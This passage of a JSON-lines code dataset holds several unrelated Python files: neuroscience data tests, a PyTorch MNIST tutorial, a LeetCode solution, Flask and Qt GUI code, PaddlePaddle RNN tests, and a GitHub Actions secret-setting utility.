check_dtype=False)\n\n\n@pytest.mark.parametrize('roundtrip', [True, False])\ndef test_add_behavior_only_metadata(roundtrip, roundtripper,\n behavior_only_metadata_fixture):\n\n metadata = behavior_only_metadata_fixture\n nwbfile = pynwb.NWBFile(\n session_description='asession',\n identifier='afile',\n session_start_time=metadata['date_of_acquisition']\n )\n nwb.add_metadata(nwbfile, metadata, behavior_only=True)\n\n if roundtrip:\n obt = roundtripper(nwbfile, BehaviorNwbApi)\n else:\n obt = BehaviorNwbApi.from_nwbfile(nwbfile)\n\n metadata_obt = obt.get_metadata()\n\n assert len(metadata_obt) == len(metadata)\n for key, val in metadata.items():\n assert val == metadata_obt[key]\n\n\n@pytest.mark.parametrize('roundtrip', [True, False])\ndef test_add_task_parameters(nwbfile, roundtrip,\n roundtripper, task_parameters):\n\n nwb.add_task_parameters(nwbfile, task_parameters)\n\n if roundtrip:\n obt = roundtripper(nwbfile, BehaviorNwbApi)\n else:\n obt = BehaviorNwbApi.from_nwbfile(nwbfile)\n\n task_parameters_obt = obt.get_task_parameters()\n\n assert len(task_parameters_obt) == len(task_parameters)\n for key, val in task_parameters.items():\n if key == 'omitted_flash_fraction':\n if math.isnan(val):\n assert math.isnan(task_parameters_obt[key])\n if math.isnan(task_parameters_obt[key]):\n assert math.isnan(val)\n else:\n assert val == task_parameters_obt[key]\n\n\n@pytest.mark.parametrize('roundtrip', [True, False])\ndef test_add_task_parameters_stim_nan(nwbfile, roundtrip,\n roundtripper,\n task_parameters_nan_stimulus_duration):\n \"\"\"\n Same as test_add_task_parameters, but stimulus_duration_sec is NaN\n \"\"\"\n task_params = task_parameters_nan_stimulus_duration\n nwb.add_task_parameters(nwbfile, task_params)\n\n if roundtrip:\n obt = roundtripper(nwbfile, BehaviorNwbApi)\n else:\n obt = BehaviorNwbApi.from_nwbfile(nwbfile)\n\n task_parameters_obt = obt.get_task_parameters()\n\n assert len(task_parameters_obt) == len(task_params)\n for key, val in task_params.items():\n if key in ('omitted_flash_fraction',\n 'stimulus_duration_sec'):\n if math.isnan(val):\n assert math.isnan(task_parameters_obt[key])\n if math.isnan(task_parameters_obt[key]):\n assert math.isnan(val)\n else:\n assert val == task_parameters_obt[key]\n","repo_name":"kencan7749/AllenSDK","sub_path":"allensdk/test/brain_observatory/behavior/test_write_behavior_nwb.py","file_name":"test_write_behavior_nwb.py","file_ext":"py","file_size_in_byte":8193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"32446606531","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 19 14:18:31 2021\r\n\r\n@author: VolkanKarakuş\r\n\"\"\"\r\n\r\n# logistic regression'a hidden layer eklendigi zaman ANN modeli elde etmis oluyoruz.\r\n\r\n# LogisticRegression classification icin iyiydi ama veri setimizde complexity arttigi zaman yeterli olmuyordu.\r\n# Bunun icin modelimizin complexity'sini arttirmamiz gerekiyor yani NAN-LINEARITY\r\n # Bunun icin de hidden layerlar eklememiz gerekiyor.\r\n \r\n#%% Import Libraries\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torch.autograd import Variable # gradient hesabi icin\r\nfrom torch.utils.data import DataLoader #train ve test veri setini pytorch icin kullanilabilir hale gelir.\r\n\r\n#%% Prepare Dataset\r\n# load data\r\ntrain = pd.read_csv('train.csv',dtype = np.float32)\r\n\r\n# split data into features(pixels) and labels(numbers from 0 to 9)\r\ntargets_numpy = train.label.values # bu kisim class label(targetlar)\r\nfeatures_numpy = train.loc[:,train.columns != \"label\"].values/255 # normalization\r\n\r\n# train test split. Size of train data is 80% and size of test data is 20%. \r\nfeatures_train, features_test, targets_train, targets_test = train_test_split(features_numpy,\r\n targets_numpy,\r\n test_size = 0.2,\r\n random_state = 42) \r\n\r\n# create feature and targets tensor for train set. As you remember we need variable to accumulate gradients. Therefore first we create tensor, then we will create variable\r\nfeaturesTrain = torch.from_numpy(features_train) #numpy'dan Tensor'e dondu.\r\ntargetsTrain = torch.from_numpy(targets_train).type(torch.LongTensor) # data type is long\r\n\r\n# create feature and targets tensor for test set.\r\nfeaturesTest = torch.from_numpy(features_test)\r\ntargetsTest = torch.from_numpy(targets_test).type(torch.LongTensor) # data type is long\r\n\r\n# batch_size, epoch and iteration\r\n\"\"\"\r\nbatch_size, bizim verimizi kaca bolerek train edecegimiz.\r\n 1000 train veri setinden olusan elemani 10'lu gruplarsak herbir grubun icinde 100 tane eleman olur.batch_size=100\r\n \r\nepoch, kac kere train edildigi.epoch=5 icin ayni veri setini 5 kere train edicem demektir.\r\n loss azalana kadar train etmeliyiz.\r\n\"\"\"\r\nbatch_size = 100\r\nn_iters = 10000\r\nnum_epochs = n_iters / (len(features_train) / batch_size) # num_epochs=n_iters/len(group_size)\r\nnum_epochs = int(num_epochs)\r\n\r\n# Pytorch train and test sets\r\ntrain = torch.utils.data.TensorDataset(featuresTrain,targetsTrain) # elimizdeki datasetini tensor data setine cevirir.\r\ntest = torch.utils.data.TensorDataset(featuresTest,targetsTest) #\r\n\r\n# data loader (elimizdeki veri seti ile sample'larimizin combine edilmesini saglar ve multiprocess yapmamizi saglar.Bu da sureci hizlandirir.)\r\ntrain_loader = DataLoader(train, batch_size = batch_size, shuffle = False)\r\ntest_loader = DataLoader(test, batch_size = batch_size, shuffle = False)\r\n\r\n# visualize one of the images in data set\r\nplt.imshow(features_numpy[10].reshape(28,28))\r\nplt.axis(\"off\")\r\nplt.title(str(targets_numpy[10]))\r\nplt.savefig('graph.png')\r\nplt.show()\r\n#%% Create ANN Model\r\nclass ANNModel(nn.Module):\r\n \r\n def __init__(self, input_dim, hidden_dim, output_dim):\r\n super(ANNModel, self).__init__()\r\n \r\n # Linear function 1: 784 --> 150\r\n self.fc1 = nn.Linear(input_dim, hidden_dim) \r\n # Non-linearity 1\r\n self.relu1 = nn.ReLU()\r\n \r\n # Linear function 2: 150 --> 150\r\n self.fc2 = nn.Linear(hidden_dim, hidden_dim)\r\n # Non-linearity 2\r\n self.tanh2 = nn.Tanh()\r\n \r\n # Linear function 3: 150 --> 150\r\n self.fc3 = nn.Linear(hidden_dim, hidden_dim)\r\n # Non-linearity 3\r\n self.elu3 = nn.ELU()\r\n \r\n # Linear function 4 (readout): 150 --> 10\r\n self.fc4 = nn.Linear(hidden_dim, output_dim) \r\n \r\n def forward(self, x):\r\n # Linear function 1\r\n out = self.fc1(x)\r\n # Non-linearity 1\r\n out = self.relu1(out)\r\n \r\n # Linear function 2\r\n out = self.fc2(out)\r\n # Non-linearity 2\r\n out = self.tanh2(out)\r\n \r\n # Linear function 2\r\n out = self.fc3(out)\r\n # Non-linearity 2\r\n out = self.elu3(out)\r\n \r\n # Linear function 4 (readout)\r\n out = self.fc4(out)\r\n return out\r\n\r\n# instantiate ANN\r\ninput_dim = 28*28\r\nhidden_dim = 150 #hidden layer dim is one of the hyper parameter and it should be chosen and tuned. For now I only say 150 there is no reason.\r\noutput_dim = 10\r\n\r\n# Create ANN\r\nmodel = ANNModel(input_dim, hidden_dim, output_dim)\r\n\r\n# Cross Entropy Loss \r\nerror = nn.CrossEntropyLoss() # yukariya softmax eklememiz gerekiyordu ama zaten bu CrossEntropyLoss'un icinde var.o yuzden eklemedik.\r\n\r\n#%% SGD Optimizer\r\nlearning_rate = 0.02\r\noptimizer = torch.optim.SGD(model.parameters(), lr=learning_rate)\r\n \r\n# ANN model training\r\ncount = 0\r\nloss_list = []\r\niteration_list = []\r\naccuracy_list = []\r\nfor epoch in range(num_epochs):\r\n for i, (images, labels) in enumerate(train_loader):\r\n\r\n train = Variable(images.view(-1, 28*28))\r\n labels = Variable(labels)\r\n \r\n # Clear gradients\r\n optimizer.zero_grad()\r\n \r\n # Forward propagation\r\n outputs = model(train)\r\n \r\n # Calculate softmax and ross entropy loss\r\n loss = error(outputs, labels)\r\n \r\n # Calculating gradients\r\n loss.backward()\r\n \r\n # Update parameters\r\n optimizer.step()\r\n \r\n count += 1\r\n \r\n if count % 50 == 0:\r\n # Calculate Accuracy \r\n correct = 0\r\n total = 0\r\n # Predict test dataset\r\n for images, labels in test_loader:\r\n\r\n test = Variable(images.view(-1, 28*28))\r\n \r\n # Forward propagation\r\n outputs = model(test)\r\n \r\n # Get predictions from the maximum value\r\n predicted = torch.max(outputs.data, 1)[1]\r\n \r\n # Total number of labels\r\n total += len(labels)\r\n\r\n # Total correct predictions\r\n correct += (predicted == labels).sum()\r\n \r\n accuracy = 100 * correct / float(total)\r\n \r\n # store loss and iteration\r\n loss_list.append(loss.data)\r\n iteration_list.append(count)\r\n accuracy_list.append(accuracy)\r\n if count % 500 == 0:\r\n # Print Loss\r\n print('Iteration: {} Loss: {} Accuracy: {} %'.format(count, loss.data, accuracy))\r\n \r\n","repo_name":"volkaankarakus/pytorch","sub_path":"ANN/pytorchANN.py","file_name":"pytorchANN.py","file_ext":"py","file_size_in_byte":6937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29807178526","text":"import collections\nfrom typing import List\n\nclass Solution:\n \"\"\"\n 请你判断是否可能完成所有课程的学习?如果可以,返回 true ;否则,返回 false 。\n \"\"\"\n def canFinish(self, numCourses: int, prerequisites: List[List[int]]) -> bool:\n indegree = [0 for _ in range(numCourses)]\n edge = {i:[] for i in range(numCourses)}\n res = 0\n\n for cur, pre in prerequisites:\n indegree[cur] += 1\n edge[pre].append(cur)\n\n queue = collections.deque(i for i in range(numCourses) if indegree[i] == 0)\n\n while queue:\n course = queue.pop()\n res += 1\n for i in edge[course]:\n indegree[i] -= 1\n if indegree[i] == 0:\n queue.append(i)\n\n return res == numCourses\n \n\n \"\"\"\n 返回你为了学完所有课程所安排的学习顺序。可能会有多个正确的顺序,你只要返回 任意一种 就可以了。如果不可能完成所有课程,返回 一个空数组 。\n \"\"\"\n def findOrder(self, numCourses, prerequisites):\n indegree = [0 for _ in range(numCourses)]\n edge = {i:[] for i in range(numCourses)}\n res = []\n\n for cur, pre in prerequisites:\n indegree[cur] += 1\n edge[pre].append(cur)\n\n queue = collections.deque(i for i in range(numCourses) if indegree[i] == 0)\n\n while queue:\n course = queue.pop()\n res.append(course)\n for i in edge[course]:\n indegree[i] -= 1\n if indegree[i] == 0:\n queue.append(i)\n\n return res\n \n\nif __name__ == '__main__':\n # ======= Test Case =======\n numCourses = 4\n prerequisites = [[1,0],[2,0],[3,1],[3,2]]\n # ====== Driver Code ======\n Sol = Solution()\n res = Sol.findOrder(numCourses, prerequisites)\n print(res)","repo_name":"bizbard/leetcode-hot100-python","sub_path":"课程表.py","file_name":"课程表.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32050259060","text":"from flask import redirect, render_template\nfrom app import application\nfrom app.models import User\nfrom app.forms.user import UserCreateForm\n\n\n@application.route('/users', methods=['GET'])\ndef index():\n users = User.query.all()\n return render_template('users/index.html', workspaces=users)\n\n\n@application.route('/users/new', methods=['GET', 'POST'])\ndef create():\n form = UserCreateForm()\n if form.validate_on_submit():\n User.create(\n name=form.name.data,\n email=form.email.data,\n )\n\n return redirect('/users')\n return render_template('users/create.html', form=form)\n","repo_name":"iwabuchi02/ci_cd_flask","sub_path":"app/views/users_view.py","file_name":"users_view.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20341681845","text":"# © MNELAB developers\n#\n# License: BSD (3-clause)\n\nfrom mne.io.pick import channel_type, get_channel_type_constants\nfrom PySide6.QtCore import QSortFilterProxyModel, Qt, Slot\nfrom PySide6.QtGui import QStandardItem, QStandardItemModel\nfrom PySide6.QtWidgets import (\n QAbstractItemView,\n QComboBox,\n QDialog,\n QDialogButtonBox,\n QStyledItemDelegate,\n QTableView,\n QVBoxLayout,\n)\n\nchannel_types = [k.upper() for k in get_channel_type_constants().keys()]\n\n\nclass ChannelPropertiesDialog(QDialog):\n def __init__(self, parent, info, title=\"Channel Properties\"):\n super().__init__(parent)\n self.setWindowTitle(title)\n\n self.model = QStandardItemModel(info[\"nchan\"], 4)\n self.model.setHorizontalHeaderLabels([\"#\", \"Label\", \"Type\", \"Bad\"])\n for index, ch in enumerate(info[\"chs\"]):\n item = QStandardItem()\n item.setData(index, Qt.DisplayRole)\n item.setFlags(item.flags() & ~Qt.ItemIsEditable)\n self.model.setItem(index, 0, item)\n self.model.setItem(index, 1, QStandardItem(ch[\"ch_name\"]))\n kind = channel_type(info, index).upper()\n self.model.setItem(index, 2, QStandardItem(str(kind)))\n bad = QStandardItem()\n bad.setData(ch[\"ch_name\"] in info[\"bads\"], Qt.UserRole)\n bad.setCheckable(True)\n bad.setEditable(False)\n checked = ch[\"ch_name\"] in info[\"bads\"]\n bad.setCheckState(Qt.Checked if checked else Qt.Unchecked)\n self.model.setItem(index, 3, bad)\n\n self.model.itemChanged.connect(bad_changed)\n self.proxymodel = MySortFilterProxyModel()\n self.proxymodel.setDynamicSortFilter(False)\n self.proxymodel.setSourceModel(self.model)\n\n self.view = QTableView()\n self.view.setModel(self.proxymodel)\n self.view.setItemDelegateForColumn(2, ComboBoxDelegate(self.view))\n self.view.setEditTriggers(QAbstractItemView.AllEditTriggers)\n self.view.verticalHeader().setVisible(False)\n self.view.horizontalHeader().setStretchLastSection(True)\n self.view.setShowGrid(False)\n self.view.setSelectionMode(QAbstractItemView.NoSelection)\n self.view.setSortingEnabled(True)\n self.view.sortByColumn(0, Qt.AscendingOrder)\n\n vbox = QVBoxLayout(self)\n vbox.addWidget(self.view)\n self.buttonbox = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)\n vbox.addWidget(self.buttonbox)\n self.buttonbox.accepted.connect(self.accept)\n self.buttonbox.rejected.connect(self.reject)\n\n self.resize(475, 650)\n self.view.setColumnWidth(0, 70)\n self.view.setColumnWidth(1, 155)\n self.view.setColumnWidth(2, 90)\n\n\nclass MySortFilterProxyModel(QSortFilterProxyModel):\n \"\"\"Add ability to filter on Qt.UserRole if Qt.DisplayRole is None.\n\n This is useful for the 'Bad' column, which stores its data (True/False) as Qt.UserRole\n instead of the default Qt.DisplayRole.\n \"\"\"\n\n def lessThan(self, left, right):\n left_data = self.sourceModel().data(left)\n right_data = self.sourceModel().data(right)\n if left_data is None:\n left_data = self.sourceModel().data(left, Qt.UserRole)\n if right_data is None:\n right_data = self.sourceModel().data(right, Qt.UserRole)\n\n return left_data < right_data\n\n\nclass ComboBoxDelegate(QStyledItemDelegate):\n @Slot()\n def commit_data(self):\n self.commitData.emit(self.sender())\n self.closeEditor.emit(self.sender())\n\n def createEditor(self, parent, option, index):\n editor = QComboBox(parent)\n editor.addItems(channel_types)\n editor.currentIndexChanged.connect(self.commit_data)\n return editor\n\n def setEditorData(self, editor, index):\n value = index.model().data(index, Qt.EditRole)\n editor.setCurrentIndex(editor.findText(value))\n editor.showPopup()\n\n def setModelData(self, editor, model, index):\n value = editor.currentText()\n model.setData(index, value, Qt.EditRole)\n\n def updateEditorGeometry(self, editor, option, index):\n editor.setGeometry(option.rect)\n\n\n@Slot()\ndef bad_changed(item):\n if item.checkState() == Qt.Checked:\n item.setData(True, Qt.UserRole)\n else:\n item.setData(False, Qt.UserRole)\n","repo_name":"cbrnr/mnelab","sub_path":"mnelab/dialogs/channel_properties.py","file_name":"channel_properties.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","stars":206,"dataset":"github-code","pt":"52"} +{"seq_id":"453045711","text":"from __future__ import print_function\n\nimport unittest\nimport numpy\n\nimport paddle.fluid as fluid\nimport paddle.fluid.layers as layers\nimport paddle.fluid.core as core\n\nfrom paddle.fluid.executor import Executor\nfrom paddle.fluid import framework\n\nfrom paddle.fluid.layers.rnn import LSTMCell, GRUCell, RNNCell\nfrom paddle.fluid.layers import rnn as dynamic_rnn\nfrom paddle.fluid import contrib\nfrom paddle.fluid.contrib.layers import basic_lstm\nimport paddle.fluid.layers.utils as utils\n\nimport numpy as np\n\n\nclass TestLSTMCell(unittest.TestCase):\n def setUp(self):\n self.batch_size = 4\n self.input_size = 16\n self.hidden_size = 16\n\n def test_run(self):\n inputs = fluid.data(\n name='inputs', shape=[None, self.input_size], dtype='float32')\n pre_hidden = fluid.data(\n name='pre_hidden', shape=[None, self.hidden_size], dtype='float32')\n pre_cell = fluid.data(\n name='pre_cell', shape=[None, self.hidden_size], dtype='float32')\n\n cell = LSTMCell(self.hidden_size)\n lstm_hidden_new, lstm_states_new = cell(inputs, [pre_hidden, pre_cell])\n\n lstm_unit = contrib.layers.rnn_impl.BasicLSTMUnit(\n \"basicLSTM\", self.hidden_size, None, None, None, None, 1.0,\n \"float32\")\n lstm_hidden, lstm_cell = lstm_unit(inputs, pre_hidden, pre_cell)\n\n if core.is_compiled_with_cuda():\n place = core.CUDAPlace(0)\n else:\n place = core.CPUPlace()\n exe = Executor(place)\n exe.run(framework.default_startup_program())\n\n inputs_np = np.random.uniform(\n -0.1, 0.1, (self.batch_size, self.input_size)).astype('float32')\n pre_hidden_np = np.random.uniform(\n -0.1, 0.1, (self.batch_size, self.hidden_size)).astype('float32')\n pre_cell_np = np.random.uniform(\n -0.1, 0.1, (self.batch_size, self.hidden_size)).astype('float32')\n\n param_names = [[\n \"LSTMCell/BasicLSTMUnit_0.w_0\", \"basicLSTM/BasicLSTMUnit_0.w_0\"\n ], [\"LSTMCell/BasicLSTMUnit_0.b_0\", \"basicLSTM/BasicLSTMUnit_0.b_0\"]]\n\n for names in param_names:\n param = np.array(fluid.global_scope().find_var(names[0]).get_tensor(\n ))\n param = np.random.uniform(\n -0.1, 0.1, size=param.shape).astype('float32')\n fluid.global_scope().find_var(names[0]).get_tensor().set(param,\n place)\n fluid.global_scope().find_var(names[1]).get_tensor().set(param,\n place)\n\n out = exe.run(feed={\n 'inputs': inputs_np,\n 'pre_hidden': pre_hidden_np,\n 'pre_cell': pre_cell_np\n },\n fetch_list=[lstm_hidden_new, lstm_hidden])\n\n self.assertTrue(np.allclose(out[0], out[1], rtol=1e-4, atol=0))\n\n\nclass TestGRUCell(unittest.TestCase):\n def setUp(self):\n self.batch_size = 4\n self.input_size = 16\n self.hidden_size = 16\n\n def test_run(self):\n inputs = fluid.data(\n name='inputs', shape=[None, self.input_size], dtype='float32')\n pre_hidden = layers.data(\n name='pre_hidden',\n shape=[None, self.hidden_size],\n append_batch_size=False,\n dtype='float32')\n\n cell = GRUCell(self.hidden_size)\n gru_hidden_new, _ = cell(inputs, pre_hidden)\n\n gru_unit = contrib.layers.rnn_impl.BasicGRUUnit(\n \"basicGRU\", self.hidden_size, None, None, None, None, \"float32\")\n gru_hidden = gru_unit(inputs, pre_hidden)\n\n if core.is_compiled_with_cuda():\n place = core.CUDAPlace(0)\n else:\n place = core.CPUPlace()\n exe = Executor(place)\n exe.run(framework.default_startup_program())\n\n inputs_np = np.random.uniform(\n -0.1, 0.1, (self.batch_size, self.input_size)).astype('float32')\n pre_hidden_np = np.random.uniform(\n -0.1, 0.1, (self.batch_size, self.hidden_size)).astype('float32')\n\n param_names = [\n [\"GRUCell/BasicGRUUnit_0.w_0\", \"basicGRU/BasicGRUUnit_0.w_0\"],\n [\"GRUCell/BasicGRUUnit_0.w_1\", \"basicGRU/BasicGRUUnit_0.w_1\"],\n [\"GRUCell/BasicGRUUnit_0.b_0\", \"basicGRU/BasicGRUUnit_0.b_0\"],\n [\"GRUCell/BasicGRUUnit_0.b_1\", \"basicGRU/BasicGRUUnit_0.b_1\"]\n ]\n\n for names in param_names:\n param = np.array(fluid.global_scope().find_var(names[0]).get_tensor(\n ))\n param = np.random.uniform(\n -0.1, 0.1, size=param.shape).astype('float32')\n fluid.global_scope().find_var(names[0]).get_tensor().set(param,\n place)\n fluid.global_scope().find_var(names[1]).get_tensor().set(param,\n place)\n\n out = exe.run(feed={'inputs': inputs_np,\n 'pre_hidden': pre_hidden_np},\n fetch_list=[gru_hidden_new, gru_hidden])\n\n self.assertTrue(np.allclose(out[0], out[1], rtol=1e-4, atol=0))\n\n\nclass TestRnn(unittest.TestCase):\n def setUp(self):\n self.batch_size = 4\n self.input_size = 16\n self.hidden_size = 16\n self.seq_len = 4\n\n def test_run(self):\n inputs_basic_lstm = fluid.data(\n name='inputs_basic_lstm',\n shape=[None, None, self.input_size],\n dtype='float32')\n sequence_length = fluid.data(\n name=\"sequence_length\", shape=[None], dtype='int64')\n\n inputs_dynamic_rnn = layers.transpose(inputs_basic_lstm, perm=[1, 0, 2])\n cell = LSTMCell(self.hidden_size, name=\"LSTMCell_for_rnn\")\n output, final_state = dynamic_rnn(\n cell=cell,\n inputs=inputs_dynamic_rnn,\n sequence_length=sequence_length,\n is_reverse=False)\n output_new = layers.transpose(output, perm=[1, 0, 2])\n\n rnn_out, last_hidden, last_cell = basic_lstm(inputs_basic_lstm, None, None, self.hidden_size, num_layers=1, \\\n batch_first = False, bidirectional=False, sequence_length=sequence_length, forget_bias = 1.0)\n\n if core.is_compiled_with_cuda():\n place = core.CUDAPlace(0)\n else:\n place = core.CPUPlace()\n exe = Executor(place)\n exe.run(framework.default_startup_program())\n\n inputs_basic_lstm_np = np.random.uniform(\n -0.1, 0.1,\n (self.seq_len, self.batch_size, self.input_size)).astype('float32')\n sequence_length_np = np.ones(\n self.batch_size, dtype='int64') * self.seq_len\n\n inputs_np = np.random.uniform(\n -0.1, 0.1, (self.batch_size, self.input_size)).astype('float32')\n pre_hidden_np = np.random.uniform(\n -0.1, 0.1, (self.batch_size, self.hidden_size)).astype('float32')\n pre_cell_np = np.random.uniform(\n -0.1, 0.1, (self.batch_size, self.hidden_size)).astype('float32')\n\n param_names = [[\n \"LSTMCell_for_rnn/BasicLSTMUnit_0.w_0\",\n \"basic_lstm_layers_0/BasicLSTMUnit_0.w_0\"\n ], [\n \"LSTMCell_for_rnn/BasicLSTMUnit_0.b_0\",\n \"basic_lstm_layers_0/BasicLSTMUnit_0.b_0\"\n ]]\n\n for names in param_names:\n param = np.array(fluid.global_scope().find_var(names[0]).get_tensor(\n ))\n param = np.random.uniform(\n -0.1, 0.1, size=param.shape).astype('float32')\n fluid.global_scope().find_var(names[0]).get_tensor().set(param,\n place)\n fluid.global_scope().find_var(names[1]).get_tensor().set(param,\n place)\n\n out = exe.run(feed={\n 'inputs_basic_lstm': inputs_basic_lstm_np,\n 'sequence_length': sequence_length_np,\n 'inputs': inputs_np,\n 'pre_hidden': pre_hidden_np,\n 'pre_cell': pre_cell_np\n },\n fetch_list=[output_new, rnn_out])\n\n self.assertTrue(np.allclose(out[0], out[1], rtol=1e-4))\n\n\nclass TestRnnUtil(unittest.TestCase):\n \"\"\"\n Test cases for rnn apis' utility methods for coverage.\n \"\"\"\n\n def test_case(self):\n inputs = {\"key1\": 1, \"key2\": 2}\n func = lambda x: x + 1\n outputs = utils.map_structure(func, inputs)\n utils.assert_same_structure(inputs, outputs)\n try:\n inputs[\"key3\"] = 3\n utils.assert_same_structure(inputs, outputs)\n except ValueError as identifier:\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"pyqt1/MyPaddle","sub_path":"python/paddle/fluid/tests/unittests/test_rnn_cell_api.py","file_name":"test_rnn_cell_api.py","file_ext":"py","file_size_in_byte":8829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7672701742","text":"from django.conf.urls import url\nfrom django.contrib import admin\nfrom . import views\n\nurlpatterns = [\n url(r'^list/$', views.blog_list, name='list'),\n url(r'^create/$', views.blog_create),\n url(r'^detail/(?P\\d+)/$', views.blog_detail, name='detail'),\n url(r'^(?P\\d+)/edit/$', views.blog_update, name='update'),\n url(r'^(?P\\d+)/delete/$', views.blog_delete),\n url(r'^FavouriteBlog/(?P\\w+)/$', views.favourite_blog_user),\n url(r'^DelFavouriteBlog/(?P\\w+)/$', views.delete_favourite_blog_user),\n]\n\n\n\n","repo_name":"asadeque/python-django-project","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"697755101","text":"import base64\nimport os\nimport nacl.encoding\nimport nacl.public\nimport requests\n\nfrom ..Auth import GhAppPrivateKey\nfrom ..DefaultHosts import DefaultApiHost, HostGetter\nfrom ..Utils import CheckResp, LogEnvVars\nfrom .ApiRunner import ApiRunner\nfrom ._Types import (\n\t_AuthType,\n\t_ArgsType,\n\t_ArgParserType,\n\t_RespType,\n)\n\n\nclass GetRepoPubKey(ApiRunner):\n\t# https://docs.github.com/en/rest/actions/secrets#get-a-repository-public-key\n\n\tURL_BASE = 'https://{api_host}/repos/{owner}/{repo}/actions/secrets/public-key'\n\n\tdef __init__(\n\t\tself,\n\t\towner: str,\n\t\trepoName: str,\n\t\thostGetter: HostGetter = DefaultApiHost(),\n\t) -> None:\n\t\tsuper(GetRepoPubKey, self).__init__()\n\n\t\tself._url = self.URL_BASE.format(\n\t\t\tapi_host=hostGetter.GetHost(),\n\t\t\towner=owner,\n\t\t\trepo=repoName,\n\t\t)\n\n\tdef MakeRequest(self, auth: _AuthType) -> _RespType:\n\t\tauthHeaderKey, authHeaderVal = auth.GetHeader()\n\n\t\treq = requests.get(\n\t\t\turl=self._url,\n\t\t\theaders={\n\t\t\t\t'Accept': 'application/vnd.github+json',\n\t\t\t\tauthHeaderKey: authHeaderVal,\n\t\t\t},\n\t\t)\n\t\tCheckResp.CheckRespErr(req)\n\n\t\treturn req\n\n\nclass SetRepoSecret(ApiRunner):\n\t# https://docs.github.com/en/rest/actions/secrets#create-or-update-a-repository-secret\n\n\tURL_BASE = 'https://{api_host}/repos/{owner}/{repo}/actions/secrets/{secret_name}'\n\n\tdef __init__(\n\t\tself,\n\t\towner: str,\n\t\trepoName: str,\n\t\trepoPubKey: str,\n\t\trepoPubKeyID: str,\n\t\tsecretName: str,\n\t\tsecretValue: str,\n\t\thostGetter: HostGetter = DefaultApiHost(),\n\t) -> None:\n\t\tsuper(SetRepoSecret, self).__init__()\n\n\t\tself._url = self.URL_BASE.format(\n\t\t\tapi_host=hostGetter.GetHost(),\n\t\t\towner=owner,\n\t\t\trepo=repoName,\n\t\t\tsecret_name=secretName,\n\t\t)\n\n\t\tself._repoPubKey = repoPubKey\n\t\tself._repoPubKeyID = repoPubKeyID\n\t\tself._secretValue = secretValue\n\n\tdef _EncryptSecret(self) -> str:\n\t\tpubKey = nacl.public.PublicKey(\n\t\t\tself._repoPubKey.encode(\"utf-8\"),\n\t\t\tnacl.encoding.Base64Encoder()\n\t\t)\n\t\tsealedBox = nacl.public.SealedBox(pubKey)\n\t\tencrypted = sealedBox.encrypt(self._secretValue.encode(\"utf-8\"))\n\t\treturn base64.b64encode(encrypted).decode(\"utf-8\")\n\n\tdef _GenPayload(self) -> dict:\n\t\treturn {\n\t\t\t'encrypted_value': self._EncryptSecret(),\n\t\t\t'key_id': self._repoPubKeyID,\n\t\t}\n\n\tdef MakeRequest(self, auth: _AuthType) -> _RespType:\n\t\tauthHeaderKey, authHeaderVal = auth.GetHeader()\n\n\t\treq = requests.put(\n\t\t\turl=self._url,\n\t\t\theaders={\n\t\t\t\t'Accept': 'application/vnd.github+json',\n\t\t\t\tauthHeaderKey: authHeaderVal,\n\t\t\t},\n\t\t\tjson=self._GenPayload(),\n\t\t)\n\t\tCheckResp.CheckRespErr(req)\n\n\t\treturn req\n\n\nclass SetRepoSecretFromGhApp(ApiRunner):\n\n\tdef __init__(\n\t\tself,\n\t\towner: str,\n\t\trepoName: str,\n\t\tsecretName: str,\n\t\thostGetter: HostGetter = DefaultApiHost(),\n\t) -> None:\n\t\tsuper(SetRepoSecretFromGhApp, self).__init__()\n\n\t\tself._owner = owner\n\t\tself._repoName = repoName\n\t\tself._secretName = secretName\n\t\tself._hostGetter = hostGetter\n\n\tdef CliRun(self, auth: _AuthType) -> None:\n\n\t\tpubKeyGetter = GetRepoPubKey(\n\t\t\towner=self._owner,\n\t\t\trepoName=self._repoName,\n\t\t\thostGetter=self._hostGetter,\n\t\t)\n\t\tpubKeyRespJson = pubKeyGetter.MakeRequest(auth).json()\n\t\tpubKey = pubKeyRespJson['key']\n\t\tpubKeyID = pubKeyRespJson['key_id']\n\n\t\tappKeyGetter = GhAppPrivateKey.FromEnvVars()\n\t\ttoken = appKeyGetter.GetToken()\n\n\t\tsecretSetter = SetRepoSecret(\n\t\t\towner=self._owner,\n\t\t\trepoName=self._repoName,\n\t\t\trepoPubKey=pubKey,\n\t\t\trepoPubKeyID=pubKeyID,\n\t\t\tsecretName=self._secretName,\n\t\t\tsecretValue=token,\n\t\t\thostGetter=self._hostGetter,\n\t\t)\n\t\tsecretSetter.MakeRequest(auth)\n\n\t@staticmethod\n\tdef _AddOpArgParsers(opArgParser: _ArgParserType) -> None:\n\t\topArgParser.add_argument(\n\t\t\t'--secret', type=str, required=True,\n\t\t\thelp='The name of the secret to create or update.',\n\t\t)\n\n\t@classmethod\n\tdef FromArgs(cls, args: _ArgsType) -> ApiRunner:\n\t\tLogEnvVars.LogEnvVars()\n\t\trepo = os.environ['GITHUB_REPOSITORY']\n\t\towner, repoName = repo.split('/', maxsplit=1)\n\t\treturn 